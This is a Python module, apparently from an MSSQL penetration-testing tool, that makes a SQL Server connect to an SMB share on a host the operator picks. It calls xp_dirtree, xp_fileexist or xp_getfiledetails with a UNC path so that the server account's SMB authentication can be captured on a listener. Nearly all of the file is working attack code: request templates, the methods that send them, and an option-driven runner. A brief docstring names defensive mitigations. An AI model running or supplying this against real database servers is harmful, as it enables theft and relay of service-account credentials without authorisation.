SMBAuthenticationCapture.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from Mssql import Mssql
from Utils import ErrorClass, checkOptionsGivenByTheUser
from Constants import *
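class SMBAuthenticationCapture(Mssql):
    '''
    Ask the database server to access a UNC path on a host chosen by the operator.

    Each request template below passes a UNC path built from localIp and
    shareName to an extended stored procedure. This class only sends the
    request and reports whether it ran without error; whether an SMB
    authentication actually reached the listener is observed on the
    listener side, which is why callers print "perhaps" on success.

    Defensive relevance: a login able to execute these procedures with a UNC
    argument can make the server account authenticate to an arbitrary SMB
    host. Reviewing EXECUTE permission on them and filtering outbound SMB
    from database servers limits this.
    '''
    # Constants. {0}=ip, {1}=sharename.
    # The backslash before {1} is written as "\\" (same runtime string as the
    # former "\{", which is an invalid escape sequence and warns on recent
    # Python versions).
    REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE = "xp_dirtree '\\\\{0}\\{1}'"
    REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST = "xp_fileexist '\\\\{0}\\{1}'"
    REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS = "xp_getfiledetails'\\\\{0}\\{1}'"

    def __init__(self, args, localIp, shareName=DEFAULT_SHARE_NAME):
        '''
        Constructor.

        args      -- option dictionary, forwarded to Mssql.__init__
        localIp   -- host placed in the UNC path (the SMB listener)
        shareName -- share name placed in the UNC path
        '''
        Mssql.__init__(self, args=args)
        self.localIp = localIp
        self.shareName = shareName

    def captureSMBAuthenticationViaXpDirtree(self):
        '''
        Send the XP_DIRTREE request.

        Return True if the request ran without error, otherwise return the
        error object (executeRequest() is treated here as handing back an
        Exception instance on failure).
        '''
        logging.info("Capturing SMB Authentication via XP_DIRTREE...")
        request = self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format(self.localIp, self.shareName)
        data = self.executeRequest(request, ld=['subdirectory', 'depth'])
        if isinstance(data, Exception):
            logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
            # Report the failure as documented instead of falling through.
            return data
        logging.info("No error during the running: you could capture the SMB authentication")
        return True

    def captureSMBAuthenticationViaXpFileexist(self):
        '''
        Send the XP_FILEEXIST request.

        Return True if the request ran without error, otherwise return the
        error object.
        '''
        logging.info("Capturing SMB Authentication via XP_FILEEXIST...")
        request = self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format(self.localIp, self.shareName)
        data = self.executeRequest(request, ld=['File Exists', 'File is a Directory', 'Parent Directory Exists'])
        if isinstance(data, Exception):
            logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
            return data
        logging.info("No error during the running: you could capture the SMB authentication")
        return True

    def captureSMBAuthenticationViaXpGetFileDetails(self):
        '''
        Send the XP_GETFILEDETAILS request (normally Windows 2000 only).

        Return True if the request ran without error, otherwise return the
        error object.
        '''
        logging.info("Capturing SMB Authentication via XP_GETFILEDETAILS...")
        request = self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format(self.localIp, self.shareName)
        data = self.executeRequest(request, ld=['1', '2', '3', '4', '5', '6', '7', '8', '9'])
        if isinstance(data, Exception):
            # isThe2000Version() is defined outside this class body; the
            # original equality test is kept because its return type is not
            # visible here.
            if self.isThe2000Version() == False:
                logging.debug("Impossible to capture the SMB authentication via XP_GETFILEDETAILS because you are not on a MSSQL 2000: {0}".format(data))
            else:
                logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
            return data
        logging.info("No error during the running: you could capture the SMB authentication")
        return True

    def tryToCaptureASmbAuthentication(self):
        '''
        Try each method in turn until one runs without error.

        Return True as soon as a method is ok, otherwise return False.
        '''
        logging.info("Test all methods allowing to capture a SMB authentication...")
        # The former if/elif/elif chain repeated the same condition, so the
        # later branches (including "return False") could never run.
        attempts = (
            self.captureSMBAuthenticationViaXpDirtree,
            self.captureSMBAuthenticationViaXpFileexist,
            self.captureSMBAuthenticationViaXpGetFileDetails,
        )
        for attempt in attempts:
            if attempt() is True:
                return True
        logging.info("No method allows to capture a SMB authentication")
        return False

    def testAll(self):
        '''
        Run every method and print a one-line verdict through args['print'].
        '''
        self.args['print'].subtitle("Can you capture a SMB authentication ?")
        status = self.tryToCaptureASmbAuthentication()
        if status is False:
            self.args['print'].badNews("KO")
        else:
            # Success only means the request ran; hence "perhaps".
            self.args['print'].unknownNews("? (perhaps)")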
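def runSMBAuthenticationCaptureModule(args):
    '''
    Run the SMBAuthenticationCapture module.

    args is the option dictionary. Keys read here: "capture",
    "xp-dirtree-capture", "xp-fileexist-capture",
    "xp-getfiledetails-capture", "share-name", "test-module" and "print".

    Returns EXIT_MISS_ARGUMENT when the option check fails, otherwise None.
    A "perhaps" verdict only means the SQL request ran without error; the
    authentication itself has to be confirmed on the SMB listener.
    '''
    captureOptions = ["capture", "xp-dirtree-capture", "xp-fileexist-capture", "xp-getfiledetails-capture"]
    # checkOptionsGivenByTheUser is defined in another module; the original
    # equality test is kept because its return type is not visible here.
    if checkOptionsGivenByTheUser(args, captureOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT

    # (option, method to call, title, message on success, message on failure),
    # in the same precedence order as the original if/elif chains.
    actions = (
        ("capture",
         "tryToCaptureASmbAuthentication",
         "Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method",
         "You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !",
         "You can't capture a SMB authentication with these methods"),
        ("xp-dirtree-capture",
         "captureSMBAuthenticationViaXpDirtree",
         "Try to capture a SMB authentication with the xp_dirtree method only",
         "You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !",
         "You can't capture a SMB authentication with the xp_dirtree method"),
        ("xp-fileexist-capture",
         "captureSMBAuthenticationViaXpFileexist",
         "Try to capture a SMB authentication with the xp_fileexist method only",
         "You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !",
         "You can't capture a SMB authentication with the xp_fileexist method"),
        ("xp-getfiledetails-capture",
         "captureSMBAuthenticationViaXpGetFileDetails",
         "Try to capture a SMB authentication with the xp_getfiledetails method only",
         "You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !",
         "You can't capture a SMB authentication with the xp_getfiledetails method"),
    )
    # First option actually given by the user, or None when only
    # "test-module" was requested.
    selected = next((action for action in actions if args[action[0]] is not None), None)
    listenerIp = args[selected[0]][0] if selected is not None else "127.0.0.1"

    smbAuthenticationCapture = SMBAuthenticationCapture(args, listenerIp, args['share-name'][0])
    smbAuthenticationCapture.connect()
    try:
        if args["test-module"] == True:
            smbAuthenticationCapture.testAll()
        if selected is not None:
            _, methodName, title, okMessage, koMessage = selected
            args['print'].title(title)
            status = getattr(smbAuthenticationCapture, methodName)()
            if status is True:
                args['print'].unknownNews(okMessage)
            else:
                args['print'].badNews(koMessage)
    finally:
        # Close the connection even if a request raised, so it is not leaked.
        smbAuthenticationCapture.closeConnection()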